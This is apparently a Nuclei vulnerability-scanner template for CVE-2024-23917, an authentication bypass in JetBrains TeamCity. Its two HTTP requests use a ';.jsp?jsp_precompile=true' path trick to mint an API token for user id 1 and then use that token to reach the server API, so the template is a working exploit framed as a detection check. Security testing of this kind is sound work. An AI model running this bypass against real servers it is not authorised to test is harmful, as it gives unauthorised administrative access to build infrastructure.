Create CVE-2024-23917.yaml

http/cves/2024/CVE-2024-23917.yaml

@@ -0,0 +1,68 @@
+id: CVE-2024-23917
+
+info:
+  name: JetBrains TeamCity > 2023.11.3 - Authentication Bypass
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible
+  reference:
+    - https://github.com/fkie-cad/nvd-json-data-feeds
+    - https://www.rapid7.com/db/vulnerabilities/jetbrains-teamcity-cve-2024-23917/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-23917
+    cwe-id: CWE-306,CWE-288
+    epss-score: 0.00091
+    epss-percentile: 0.38219
+    cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    vendor: jetbrains
+    product: teamcity
+  tags: cve,cve2024,auth-bypass,teamcity
+
+flow: http(1) && http(2)
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/app/rest/users/id:1/tokens/{{randstr}};.jsp?jsp_precompile=true"
+    headers:
+      Content-Type: "application/x-www-form-urlencoded"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code==200
+          - "contains(content_type,'application/xml')"
+          - 'contains(body,"<token name=\"{{randstr}}\"")'
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        name: authtoken
+        internal: true
+        group: 1
+        regex:
+          - 'value="(.+)"'
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/app/rest/server"
+    headers:
+      Authorization: "Bearer {{authtoken}}"
+
+    extractors:
+      - type: dsl
+        dsl:
+          - '"Token:" + authtoken'
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code==200"
+          - "contains(content_type,'application/xml')"
+          - "contains(body,'<projects href=')"
+        condition: and